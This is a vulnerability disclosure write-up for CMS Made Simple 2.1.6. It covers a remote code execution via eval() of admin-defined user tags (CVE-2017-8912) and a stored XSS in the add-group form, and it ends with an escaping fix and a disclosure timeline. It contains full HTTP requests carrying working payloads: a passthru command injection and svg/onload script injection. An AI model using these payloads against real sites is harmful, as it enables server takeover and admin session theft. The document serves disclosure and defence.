CMSMS 2.1.6 Multiple Vulnerabilities

One day I felt like reviewing the source code of some random CMS and picked CMSMS. The choice was totally random; I did this to kill boredom.

Remote Code Execution – CVE-2017-8912

In admin/editusertag.php an admin can create custom user defined tags. The tag code is stored and executed as PHP, and evil PHP functions such as passthru() are not blacklisted.

POST /cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4
Content-Length: 115
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=2a7da2216d41e0ac; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Pragma: no-cache
Cache-Control: no-cache

_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1 

File: lib/classes/class.usertagoperations.inc.php
Line: 251

function CallUserTag($name, &$params)
{
	$row = $this->_get_from_cache($name);
	$result = FALSE;
	if( $row ) {
		$smarty = CmsApp::get_instance()->GetSmarty();
		// Build (eval) the PHP function for this tag, then invoke it
		$functionname = $this->CreateTagFunction($name);
		$result = call_user_func_array($functionname, array(&$params, &$smarty));
	}
	return $result;
}

function CreateTagFunction($name)
{
	$row = $this->_get_from_cache($name);
	if( !$row ) return;
	$functionname = 'cms_user_tag_'.$name;
	if( !function_exists($functionname) ) {
		// Strip optional PHP open/close tags from the stored tag code
		if( startswith($row['code'],'<?php') ) $row['code'] = substr($row['code'],5);
		if( endswith($row['code'],'?>') ) $row['code'] = substr($row['code'],0,-2);
		// The stored code is wrapped in a function body and eval()'d as-is
		$code = 'function '.$functionname.'($params,&$smarty) {'.$row['code']."\n}";
		@eval($code);
	}
	return $functionname;
}

‘CreateTagFunction’ builds a PHP function from the stored tag code with eval(), and ‘call_user_func_array’ in ‘CallUserTag’ then invokes that function, executing our code.

In a corporate network, once an attacker finds admin credentials (for example by accessing the database) and finds CMSMS, they can easily get a reverse shell on the box. Reminds me of some boxes in the PWK lab 😉

Stored XSS

File: admin/addgroup.php
Lines: 95, 99

<div class="pageoverflow">
  <p class="pagetext"><label for="groupname">*<?php echo lang('name')?>:</label></p>
  <p class="pageinput"><input type="text" id="groupname" name="group" maxlength="255" value="<?php echo $group?>" /></p>
</div>
<div class="pageoverflow">
  <p class="pagetext"><label for="description"><?php echo lang('description')?>:</label></p>
  <p class="pageinput"><input type="text" id="description" name="description" maxlength="255" size="80" value="<?php echo $description?>" /></p>
</div>

The ‘groupname’ and ‘description’ values are echoed straight into the input value attributes without being escaped, so a stored payload is rendered back into the admin page, leading to XSS.

POST /cms/cmsimple/admin/addgroup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cms/cmsimple/admin/addgroup.php?_sk_=92a32a8aaa87e958
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=92a32a8aaa87e958; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

_sk_=92a32a8aaa87e958&group=%3Csvg%2Fonload%3Dalert%282%29%3E&description=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&active=on&addgroup=true
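A hardened version of the two echoes above, as an added example that is not CMSMS code: the values are escaped with htmlspecialchars() before being placed in the value attributes, so the two payloads from the request become inert text. The helper names attr_escape and render_group_form are assumed, not CMSMS identifiers.

```php
<?php
// Added example (not CMSMS code). Escape values before echoing them into
// HTML attributes, which is what admin/addgroup.php fails to do.

// Hypothetical helper name. ENT_QUOTES escapes both " and ', so a value can
// never close the value="..." attribute it is placed in; ENT_SUBSTITUTE avoids
// returning an empty string on invalid UTF-8. (Before PHP 8.1 the default flags
// did not include ENT_QUOTES, so pass them explicitly.)
function attr_escape($value): string
{
    return htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical renderer for the two inputs shown in the advisory.
function render_group_form(string $group, string $description): string
{
    $g = attr_escape($group);
    $d = attr_escape($description);
    return <<<HTML
<div class="pageoverflow">
  <p class="pageinput"><input type="text" id="groupname" name="group" maxlength="255" value="{$g}" /></p>
</div>
<div class="pageoverflow">
  <p class="pageinput"><input type="text" id="description" name="description" maxlength="255" size="80" value="{$d}" /></p>
</div>
HTML;
}

// Constructed inputs: the URL-decoded payloads from the request above.
$html = render_group_form('<svg/onload=alert(2)>', '"><svg/onload=alert(3)>');
echo $html;

// Self-check: no <svg tag survives and the leading quote of the second
// payload is emitted as &quot; instead of closing the attribute.
if (strpos($html, '<svg') !== false || strpos($html, 'value="&quot;&gt;') === false) {
    throw new RuntimeException('attribute escaping failed');
}
```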

Disclosure Timeline

09-05-2017: Reported to the vendor
09-05-2017: Vendor doesn’t accept XSS issues inside the admin panel and claimed the RCE is a feature, not a bug 🙂
10-05-2017: Public disclosure
11-05-2017: Assigned CVE-2017-8912

https://www.exploit-db.com/exploits/41997/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8912
https://nvd.nist.gov/vuln/detail/CVE-2017-8912